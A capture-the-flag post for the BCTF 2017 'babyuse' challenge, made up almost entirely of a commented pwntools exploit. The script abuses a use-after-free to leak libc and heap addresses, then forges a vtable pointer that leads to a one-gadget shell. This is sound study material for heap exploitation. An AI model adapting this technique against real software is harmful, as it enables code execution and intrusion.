
BCTF 2017 Babyuse

HSr00t 2017. 12. 1. 13:51

Exploit ONLY


from pwn import *
 
# Spawn the challenge binary locally; `p` is the process handle every helper
# below talks to.  Only the local path is used -- no remote target is configured here.
p=process("./babyuse")
# Parsed ELF of the same binary.  Nothing in this listing reads `elf`; it is
# unused and could be dropped without changing behaviour.
elf=ELF("./babyuse")
 
def buy(gun,length,name):
    """Drive menu option 1 ("buy"): gun type, name length, then the name.

    gun and length are sent as decimal strings; name is sent verbatim plus a
    newline, so callers below pass packed 32-bit values as the name.
    Every step is a blocking read up to a marker followed by one line of
    input; the order of these calls is the protocol and must not change.
    """
    p.recvuntil('Exit')   # the main menu ends with an "Exit" entry
    p.sendline("1")
    p.recvuntil('95')     # gun-type prompt, matched on the substring '95'
    p.sendline(str(gun))
    p.recv(1024)          # NOTE(review): fixed-size recv, not recvuntil -- may return
                          # before the length prompt is complete; harmless for a local
                          # process but racy over a slow link
    p.sendline(str(length))
    p.recvuntil(':')      # name prompt
    p.sendline(name)
 
def select(idx):
    """Drive menu option 2 ("select"): send slot index idx as a decimal string.

    The script always calls this right before drop() on the same slot, which is
    the sequence that leaves the selection pointing at a freed object.
    """
    p.recvuntil('Exit')
    p.sendline("2")
    p.recvuntil('gun')    # slot prompt
    p.sendline(str(idx))
 
def list():
    """Drive menu option 3 ("list").

    Defined for completeness; nothing in this listing calls it.  It shadows the
    builtin ``list``, which is also not needed anywhere in this script -- rename
    it (e.g. ``list_guns``) if the script is ever extended.
    """
    p.recvuntil('Exit')
    p.sendline("3")
 
def rename(idx,length,name):
    """Drive menu option 4 ("rename"): slot idx, new length, then new name.

    Same blocking read/line-write protocol as buy().  The single call at the
    bottom of the script passes two packed 32-bit heap addresses as the name,
    so the name must be sent byte-for-byte (sendline only appends a newline).
    """
    p.recvuntil('Exit')
    p.sendline("4")
    p.recv(1024)          # NOTE(review): fixed-size recv as in buy(); see note there
    p.sendline(str(idx))
    p.recvuntil(':')      # length prompt
    p.sendline(str(length))
    p.recvuntil(':')      # name prompt
    p.sendline(name)
 
def use():
    """Drive menu option 5 ("use") and echo the output up to 'gun '.

    Deliberately stops reading right after 'gun ' -- the caller consumes the
    next 4 bytes itself with u32(p.recv(4)), which is where both leaks below
    come from.  Python 2 print statement; this file is Python 2 / pwntools.
    """
    p.recvuntil('Exit')
    p.sendline("5")
    print p.recvuntil('gun ')
 
def use_input(what):
    """Answer the sub-menu that use() leaves open; what is sent as a decimal string.

    Every caller passes 4, which presumably is the "back to main menu" choice
    of that sub-menu -- TODO confirm against the binary's menu text.
    """
    p.recvuntil('menu')
    p.sendline(str(what))
 
def drop(idx):
    """Drive menu option 6 ("drop"): free slot idx.

    The bug this script relies on (inferred from the select/drop/use sequence
    and the challenge name): dropping a slot frees its object but does not
    clear the "currently selected" reference, so a later use() operates on
    freed memory.  Clearing that reference on free, or having use() refuse a
    dropped slot, is the fix on the binary side.
    """
    p.recvuntil('Exit')
    p.sendline("6")
    p.recvuntil('delete:')
    p.sendline(str(idx))
 
# --- Stage 1: libc leak ---------------------------------------------------
# Buy two 256-byte guns, select slot 0, drop it, then use() the dangling
# selection.  The 4 bytes following 'gun ' are decoded as a little-endian
# 32-bit value (u32: this is a 32-bit target) that the script treats as
# main_arena + 0x38.  The offsets 0x38, 0x10, 0x1b2768 and 0x3ac69 are
# specific to the libc build the author used; they will not hold elsewhere.
buy(2,256,"AAAA")
buy(2,256,"BBBB")
select(0)
drop(0)
use()
main_arena = u32(p.recv(4)) - 0x38
malloc_hook = main_arena - 0x10
libc_base = malloc_hook - 0x1b2768
one_shot = libc_base + 0x3ac69          # libc address written as a "name" in stage 3
print hex(main_arena)
print hex(libc_base)
print hex(malloc_hook)
print hex(one_shot)
use_input(4)                            # leave the use() sub-menu
# --- Stage 2: heap leak ---------------------------------------------------
# Same drop-then-use pattern with two 40-byte guns.  Slot 1 ("BBBB") is still
# allocated from stage 1, so the new guns land in slots 0 and 2.  This time the
# leaked value is a heap pointer; heap_base and the two heap_* addresses are
# derived from it with offsets that depend on this binary's allocation order.
buy(2,40,"CCCC") #0
buy(2,40,"DDDD") #2
select(0)
drop(2)
drop(0)
#0,2 off 1 on   -- author's note: slots 0 and 2 are now freed, slot 1 stays allocated
use()
heap = u32(p.recv(4))
heap_base = heap - 0x68
heap_vtable = heap_base + 0x250
heap_fake = heap_base + 0x148
use_input(4)                            # leave the use() sub-menu
print hex(heap)
print hex(heap_base)
print hex(heap_vtable)
 
# --- Stage 3: overwrite the freed, still-selected object --------------------
# A 40-byte gun goes into slot 0 and a 256-byte gun whose name is the packed
# one_shot address into slot 2; slot 0 is selected and dropped once more, and
# slot 1 is then renamed with a 15-byte name made of the two heap addresses.
# The intent (inferred -- the script does not show the object layout) is that
# this rename reuses the memory of the freed slot-0 object, so the stale
# selection now sees attacker-chosen pointer fields.  Everything from here on
# depends on exact allocation sizes and order, so do not reorder these calls.
buy(1,40,"ZZZZ") #0
buy(1,256,p32(one_shot)) #2
 
select(0)
drop(0)
print "=========="
rename(1,15,p32(heap_vtable)+p32(heap_fake))
 
p.interactive()                         # hand the process I/O over to the terminal